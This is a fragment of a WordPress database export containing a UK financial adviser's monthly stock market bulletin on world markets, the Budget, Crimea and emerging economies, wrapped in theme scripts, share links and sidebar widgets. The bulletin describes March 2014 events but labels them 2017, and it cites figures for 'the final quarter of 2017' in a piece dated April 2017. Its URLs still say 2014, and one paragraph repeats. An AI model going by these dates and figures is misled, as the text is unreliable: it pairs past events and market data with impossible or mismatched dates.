src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n<p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Financial Planning for Divorcees','Financial planning associated with divorce is not going to get any easier, it’s one of those areas where you need to take action sooner rather than later.','inherit','closed','closed','','65-revision-v1','','','2017-09-21 17:25:56','2017-09-21 17:25:56','',65,'http://www.equalitywalk.org.uk/65-revision-v1',0,'revision','',0),(321,1,'2017-09-21 17:31:46','2017-09-21 17:31:46','<div id=\"wrapper\">\n<div class=\"page-title-container\">\n<div class=\"page-title\">\n<div class=\"page-title-wrapper\">\n<div class=\"page-title-captions\">\n<h1 class=\"entry-title\">2017 Stock Market Bulletin</h1>\n&nbsp;\n\n</div>\n&nbsp;\n<ul class=\"breadcrumbs\">\n 	<li><a href=\"/\">Home</a></li>\n 	<li><a title=\"Wealth Management\" href=\"../category/wealth-management/\">Wealth Management</a></li>\n 	<li><a title=\"Investments\" href=\"../category\">Investments</a></li>\n 	<li>April 2017 Stock Market Bulletin</li>\n</ul>\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n<div id=\"main\" class=\"clearfix \">\n\n&nbsp;\n<div class=\"avada-row\">\n\n&nbsp;\n<div id=\"content\" class=\"full-width\" style=\"width: 100%;\">\n\n&nbsp;\n<div id=\"post-8121\" class=\"post-8121 post type-post status-publish format-standard has-post-thumbnail hentry category-investments category-wealth-management post\">\n<span class=\"entry-title\" style=\"display: none;\">April 2017 Stock Market Bulletin</span>\n<div class=\"post-content\">\n\n&nbsp;\n<div class=\"wpb_row vc_row-fluid\">\n\n&nbsp;\n<div class=\"vc_span12 wpb_column column_container\">\n\n&nbsp;\n<div class=\"wpb_wrapper\">\n<div class=\"wpb_text_column wpb_content_element \">\n\n&nbsp;\n<div class=\"wpb_wrapper\">\n\n&nbsp;\n<h1 style=\"text-align: left;\">Stock Market Bulletin</h1>\n&nbsp;\n<h3 style=\"text-align: left;\">April 3rd 2017 – Reading time 10 minutes</h3>\n&nbsp;\n<div class=\"clearboth\"></div>\n<div class=\"demo-sep sep-double\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n<div class=\"wpb_row vc_row-fluid\">\n\n&nbsp;\n<div class=\"vc_span12 wpb_column column_container\">\n\n&nbsp;\n<div class=\"wpb_wrapper\">\n<div class=\"wpb_text_column wpb_content_element \">\n\n&nbsp;\n<div class=\"wpb_wrapper\">\n\n&nbsp;\n\nWe started last month’s bulletin in the Crimea, with Russian troops in de facto control of the peninsula.\n\n&nbsp;\n\nWell, the Crimea is now part of Russia again and the collected denunciations and threatened sanctions of William Hague, John Kerry and the European foreign ministers will do nothing to change that.\n\n&nbsp;\n\nThe question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…\n\n&nbsp;\n\n&nbsp;\n\nThe question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…\n\n&nbsp;\n\nNot that the rest of the world was peaceful in March. North and South Korea once again exchanged fire, this time over a disputed sea boundary. The North has warned that it may carry out a ‘new kind’ of nuclear test and seems to be becoming increasingly unpredictable as Kim Jong-un tightens his grip on power.\n\n&nbsp;\n\nIn the UK the big event was George Osborne’s Budget speech on Wednesday March 19<sup>th</sup>.\n\n&nbsp;\n\nThe Chancellor confounded those who had been expecting a ‘steady as you go Budget’ with a series of far reaching reforms to pensions and savings. It was easy to see the Chancellor setting out not only the battle lines for next year’s General Election, but also his own leadership manifesto in the event of a defeat for David Cameron.\n\n&nbsp;\n\nWorld stock markets generally had a disappointing month in March, with none of the major markets showing significant gains. Among the emerging markets India and Brazil both made good progress, gaining 6% and 7% respectively.\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n<div class=\"wpb_row vc_row-fluid\">\n\n&nbsp;\n<div class=\"vc_span12 wpb_column column_container\">\n\n&nbsp;\n<div class=\"wpb_wrapper\">\n<div class=\"wpb_text_column wpb_content_element \">\n\n&nbsp;\n<div class=\"wpb_wrapper\">\n\n&nbsp;\n<h1><span style=\"color: #0000ff;\"><b>United Kingdom</b></span></h1>\n&nbsp;\n\nAs noted above, the most important event in March was the Budget. The Chancellor declared that it would be a Budget for “makers, do-ers and savers” and proposed significant changes to the rules governing defined contribution pension schemes, allowing people much greater control over their own pensions and much more flexibility.\n\n&nbsp;\n\nThe Chancellor was, he said, “Prepared to trust the British people.”\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\nThere were also major changes to the Individual Savings Account regime, with the annual limit raised to £15,000 and the limit on what can go into a cash ISA removed. They’ll now be called New ISAs, or NISAs. Cue several limp headlines in the papers…\n\n&nbsp;\n\nThis monthly bulletin isn’t really the place to go into all the implications of the Budget, but it <i>will</i> impact significantly on the financial planning of many of our clients. If you have any questions at all on what the Budget might mean for you, please don’t hesitate to contact us.\n\n&nbsp;\n\nMeanwhile, the debate on Scottish devolution rumbled on. The opinion polls currently have the ‘No’ vote on 52% compared to ‘Yes’ at 37%. For those who prefer a more reliable guide the bookmakers are convinced that independence won’t happen, and are betting accordingly.\n\n&nbsp;\n\nBad news for the ‘yes’ campaign came when 1 in 3 firms polled confirmed that they would consider re-locating head offices in the event of independence, and the Westminster government continues to rule out any prospect of a currency union with an independent Scotland. The poll is still 5½ months away, on September 18<sup>th</sup>\n\n&nbsp;\n\nTwo pieces of contrasting news in March illustrated the way the UK economy may be moving, both short and long-term. Supermarket group Morrison’s issued its second profits warning as it struggled to maintain market share, squeezed by Aldi and Lidl on one side and Tesco and Sainsbury’s on the other.\n\n&nbsp;\n\nMeanwhile King Digital (a company that very few readers of this bulletin will have heard of) became Britain’s most valuable publicly listed internet company when it floated on the New York stock exchange with a valuation of $7.6bn.\n\n&nbsp;\n\nWhat does King Digital do? It makes <i>Candy Crush</i> a game which 144m people play on their mobiles every day. That’s right, a hundred and forty-four million.\n\n&nbsp;\n\nThe FTSE-100 index had a disappointing month, falling by 3% to finish March at 6,598. At the end of the first quarter of 2017 it is down 2% on a year to date basis.\n\n&nbsp;\n\n&nbsp;\n<div class=\"clearboth\"></div>\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\n&nbsp;\n<h1><span style=\"color: #0000ff;\"><b>Europe </b></span></h1>\n&nbsp;\n\nMarch saw contrasting fortunes for France and Italy, the second and third biggest Eurozone economies. In France the central bank predicted growth of just 0.2% for the first quarter – unchanged from an earlier estimate and down on the 0.3% growth in the final quarter of 2017.\n\n&nbsp;\n\nFrench industrial production also fell by 0.2% against expectations of 0.2% growth.\n\n&nbsp;\n\n&nbsp;\n\nMeanwhile Italy posted its biggest rise in industrial production for two years, up 1% in January and comfortably ahead of all the forecasts. This confirmed a slow but gradual recovery in the country, which finally came out of its longest post-war recession in the final quarter of 2017.\n\n&nbsp;\n\nThat said, industrial production remains 24% lower than in 2008, so there is still some way to go…\n\n&nbsp;\n\nFigures released for January showed that Germany had a €15bn trade surplus in January (up from a revised figure of €13.9bn for the previous month – and as a comparison the UK had a trade deficit of £22bn in the three months to December 2017).\n\n&nbsp;\n\nThe German inflation rate fell to 1% in March, a 3½ year low and down from 1.2% in February. There was also good news on unemployment which fell more than expected in March, as the German economy was boosted by relatively mild winter weather. The number unemployed fell by 12,000 – against analysts’ predictions of 7,500.\n\n&nbsp;\n\nOn the stock markets the German DAX index ended March 1% down at 9,556, while the French CAC-40 index was virtually unchanged at 4,391.\n\n&nbsp;\n\n&nbsp;\n<div class=\"clearboth\"></div>\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\n&nbsp;\n<h1><span style=\"color: #0000ff;\"><b>USA</b></span></h1>\n&nbsp;\n\nIn the US the news was less good – the University of Michigan’s index of consumer sentiment fell, even though personal spending rose in February. It seems that Americans are spending now as they feel less confident about having the money to spend in the future.\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\nGDP growth was revised up to 2.6% for the final quarter of 2017 and jobless claims were down to a 4 month low. But manufacturing slowed in March and figures for February confirmed another near $40bn trade deficit – a figure the US Government seems powerless to do anything about.\n\n&nbsp;\n\nFor now President Obama appears to have won his battle with Congress, but the race to succeed him is gradually cranking up (with Hilary Clinton still the favourite). Expect to hear the words ‘lame’ and ‘duck’ around this time next year.\n\n&nbsp;\n\nNo lame ducks in the Zuckerberg household where Mark (not yet 30) has seen his fortune rise by $15bn over the past two years due to the strong performance of Facebook shares. I believe I was sceptical at the time of the flotation. So that would be a large slice of humble pie…\n\n&nbsp;\n\nThe Dow Jones index managed to stagger up by 1% in March, with the index closing at 16,458 – fractionally down on a year-to-date basis.\n\n&nbsp;\n\n&nbsp;\n<div class=\"clearboth\"></div>\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\n&nbsp;\n<h1><span style=\"color: #0000ff;\"><b>Far East </b></span></h1>\n&nbsp;\n\nDespite the Chinese Government announcing a target of 7.5% growth for the next 12 months, several indicators released in March suggested that the Chinese economy is slowing down.\n\n&nbsp;\n<p style=\"text-align: center;\"></p>\nIndustrial production for the first two months of 2017 was 8.6% up on the same period in 2017, but the expectation had been for 9.5% growth. This was the worst performance since 2009 and was partly due to strikes and industrial unrest in factories across China.\n\n&nbsp;\n\nConsumer spending also appears to be running out of steam, with the growth in retail sales in January and February the slowest for three years. That said it was up by 11.8% (a figure the West can’t even dream about) but expectations had been for 13.5%.\n\n&nbsp;\n\nWith investment in fixed assets by business also down, these are worrying signs for the Chinese economy, which will have a “drag” effect on the rest of region.\n\n&nbsp;\n\nPresident Li Keqiang spoke of “severe challenges” and there were suggestions that the Central Bank could announce a series of measures to inject some impetus into the economy.\n\n&nbsp;\n\nJapan’s economy also grew more slowly than expected in the fourth quarter of 2017, and again, both business investment and consumer spending fell below expectations.\n\n&nbsp;\n\nNo such worries in South Korea where the trade surplus for March improved to $4.19bn, up from $933m the previous month. Exports jumped to the second-highest figure on record due to higher demand from the USA and Europe.\n\n&nbsp;\n\nThe South Korean and Japanese stock markets were virtually unchanged at the end of March, whilst China fell by just 1% to 2,033. The Hong Kong market declined by 3% to 22,151 and is now down by 5% for the year as a whole.\n\n&nbsp;\n\n&nbsp;\n<div class=\"clearboth\"></div>\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\n&nbsp;\n<h1><span style=\"color: #0000ff;\"><b>Emerging Markets </b></span></h1>\n&nbsp;\n\nIt’s hardly surprising that the Russian market fell significantly in March, given the threat of economic sanctions. The main index ended the month down 5% at 1,369 – down 9% on a year-to-date basis.\n\n&nbsp;\n\nHowever, figures for the last quarter of 2017 confirmed that the Russian economy was doing better than expected: it grew by 2% for the final three months of last year, against expectations of 1.3%.\n\n&nbsp;\n\nAs indicated above, there were much better returns from the other major emerging markets, with the Indian index up 6% in the month at 22,386 and the Brazilian index up 7% to 50,415 (although it is still down overall in 2017).\n\n&nbsp;\n\n&nbsp;\n<h2><span style=\"color: #0000ff;\"><b>And finally…</b></span></h2>\n&nbsp;\n\nMany London estate agents had to be rushed to hospital with acute excitement (or greed) in March, when a study was published suggesting that the average central London flat will cost £36m by the year 2050.\n\n&nbsp;\n\nLondon Central Portfolio launched a £100m fund to buy flats in ‘prime’ areas of London (that is, the area surrounding Hyde Park, from Notting Hill to Pimlico) confident that its prediction of 9% a year annual growth would become a reality, with or without the help of Russian oligarchs.\n\n&nbsp;\n\nSadly none of us in the office own a flat in Notting Hill or moonlights as an oligarch, so we’ll back at the beginning of May with the next monthly bulletin.\n\n&nbsp;\n\nIn the meantime we’ll be happy to answer your questions on the Budget or any other aspect of financial planning.\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"meta-info\">\n\n&nbsp;\n<div class=\"vcard\">\nBy <span class=\"sep\">|</span>Categories: <a title=\"View all posts in Investments\" href=\"../category\" rel=\"category tag\">Investments</a>, <a title=\"View all posts in Wealth Management\" href=\"../category/wealth-management/\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on April 2014 Stock Market Bulletin\" href=\"../april-2014-stock-market-bulletin/\">0 Comments</a></div>\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"share-box\">\n\n&nbsp;\n<h4></h4>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"facebook\">\n<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;p[title]=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\nFacebook\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nFacebook\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"twitter\">\n<a href=\"http://twitter.com/home?status=April+2014+Stock+Market+Bulletin%20http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">\nTwitter\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nTwitter\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"linkedin\">\n<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\nLinkedIn\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nLinkedIn\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"reddit\">\n<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\nReddit\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nReddit\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"tumblr\">\n<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fapril-2014-stock-market-bulletin%2F&amp;name=April+2014+Stock+Market+Bulletin&amp;description=We+started+last+month%E2%80%99s+bulletin+in+the+Crimea%2C+with+Russian+troops+in+de+facto+control+of+the+peninsula.+Well%2C+the+Crimea+is+now+part+of+Russia+again+and+the+collected+denunciations+and+threatened+sanctions+....\" target=\"_blank\" rel=\"nofollow\">\nTumblr\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nTumblr\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"google\">\n<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">\nGoogle +1\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nGoogle +1\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"tf-pinterest\">\n<a href=\"#\">\nPinterest\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nPinterest\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"social-networks social-networks-dark\">\n<ul class=\"social-networks social-networks-dark\">\n 	<li class=\"email\">\n<a href=\"mailto:?subject=April 2014 Stock Market Bulletin&amp;body=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\">\nEmail\n</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nEmail\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"about-author\">\n\n&nbsp;\n<div class=\"title\">\n<h2>About the Author:</h2>\n<div class=\"title-sep-container\"></div>\n</div>\n&nbsp;\n<div class=\"about-author-container\"></div>\n&nbsp;\n\n</div>\n<!-- You can start editing here. -->\n\n\n<!-- If comments are open, but there are no comments. -->\n<div id=\"respond\" class=\"comment-respond\">\n\n&nbsp;\n<div class=\"title\">\n<h2></h2>\n<div class=\"title-sep-container\"></div>\n</div>\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../april-2014-stock-market-bulletin/\" rel=\"nofollow\">Cancel reply</a></small>\n\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\n&nbsp;\n<div id=\"comment-textarea\"></div>\n<p class=\"form-submit\">\n<input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8121\" /></p>\n&nbsp;\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"ed534b789c\" /></p>\n&nbsp;\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"25\" /></p>\n&nbsp;\n\n</form></div>\n<!-- #respond -->\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n<div id=\"sidebar\" style=\"display: none;\">\n\n&nbsp;\n<div id=\"text-24\" class=\"widget widget_text\">\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big>\n\npeople who get our best financial wisdom on a weekly basis.</center>\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\n<p>&#13;\n		</div>\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\n<div class=\"heading\">\n<p>New Guides</p>\n</div>\n<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>\n<p>&#13;\n&#13;\n		</div>\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">\n<div class=\"tab-holder\"><p>&#13;\n			</p>\n<div class=\"tab-hold tabs-wrapper\"><p>&#13;\n				</p>\n<ul id=\"tabs\" class=\"tabset tabs\">\n<li><a href=\"#tab-popular\">Popular</a></li>\n<p>&#13;\n															</p>\n<li><a href=\"#tab-recent\">Recent</a></li>\n<p>&#13;\n														</ul>\n<div class=\"tab-box tabs-container\"><p>&#13;\n										</p>\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\n												</p>\n<ul class=\"news-list\">\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										October 12th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										March 21st, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										September 10th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										September 18th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										September 5th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n													</ul>\n</div>\n<p>&#13;\n															</p>\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\n												</p>\n<ul class=\"news-list\">\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										June 10th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>\n<p>&#13;\n																</p>\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										June 9th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										June 6th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										June 6th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n														</p>\n<li>&#13;\n<br />\n<div class=\"post-holder\"><p>&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									</p>\n<div class=\"meta\">&#13;\n										June 6th, 2017									</div>\n<p>&#13;\n								</div>\n<p>&#13;\n							</li>\n<p>&#13;\n													</ul>\n</div>\n<p>&#13;\n														</div>\n<p>&#13;\n			</div>\n<p>&#13;\n		</div>\n<p>&#13;\n		</div>\n<div id=\"categories-3\" class=\"widget widget_categories\">\n<div class=\"heading\">\n<p>Post Categories</p>\n</div>\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\n		}\n	}\n	dropdown.onchange = onCatChange;\n/* ]]]]><![CDATA[> */\n]]></script></a></div>\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\n<div class=\"heading\">\n\nGet Social\n\n</div>\n<ul class=\"social-networks clearfix\">\n<ul class=\"social-networks clearfix\">\n 	<li class=\"rss\">\n<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\n<div class=\"popup\">\n\n&nbsp;\n<div class=\"holder\">\n\n&nbsp;\n\nRSS\n\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul 